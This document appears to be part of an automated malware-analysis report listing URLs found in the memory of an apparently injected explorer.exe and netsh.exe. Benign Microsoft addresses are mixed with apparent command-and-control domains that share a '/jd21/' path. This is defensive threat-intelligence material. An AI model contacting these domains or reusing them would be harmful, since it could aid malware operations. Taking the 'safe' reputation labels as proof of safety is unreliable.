          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.b2vvuc00.sbs/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://excel.office.comexplorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.p-afactorysale.shop/jd21/www.arthemis-168bet.siteexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.crucka.xyz/jd21/www.tech-with-thulitha.siteexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.tech-with-thulitha.siteReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.arthemis-168bet.site/jd21/www.fasci.onlineexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.b2vvuc00.sbs/jd21/www.tyumk.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.fostertv.netReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.urbanholidayz.com/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.susansellsmarin.comReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.tyumk.xyz/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.zaib.art/jd21/explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://urbanholidayz.com/jd21/?4h6=58Yhl8pxScvjrZW7vdX/11LwICGJdJmrB7bkiksH/i9UnBAUhv3EZPgtL2ZDcYGsexplorer.exe, 00000002.00000002.4160740233.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003FBF000.00000004.10000000.00040000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.fostertv.net/jd21/www.p-afactorysale.shopexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.1718215415.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.susansellsmarin.com/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.zaib.artReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.fostertv.net/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://wns.windows.com/Lexplorer.exe, 00000002.00000002.4157772828.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.fasci.online/jd21/www.uhug.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://word.office.comexplorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.batremake.com/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.urbanholidayz.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.crucka.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.uhug.xyzReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.crucka.xyz/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.zaib.artexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.arthemis-168bet.site/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.arthemis-168bet.siteexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1718215415.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.00050591.xyz/jd21/www.californiacurrentelectric.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.californiacurrentelectric.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://outlook.com_explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.susansellsmarin.com/jd21/www.urbanholidayz.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.b2vvuc00.sbsexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.tyumk.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.tech-with-thulitha.site/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.uhug.xyz/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.maioral-store.comReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://powerpoint.office.comcemberexplorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.fasci.onlineReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.uhug.xyz/jd21/www.maioral-store.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.p-afactorysale.shopReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.microexplorer.exe, 00000002.00000000.1713192297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4153445383.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4149679384.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.californiacurrentelectric.comReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.tyumk.xyzReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.fasci.online/jd21/explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.fostertv.netexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.p-afactorysale.shopexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.batremake.com/jd21/www.crucka.xyzexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/qexplorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.00050591.xyzReferer:explorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.batremake.comexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.tech-with-thulitha.siteexplorer.exe, 00000002.00000003.3108477434.000000000CB0C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106282343.000000000CAE9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4159471461.000000000CB0D000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
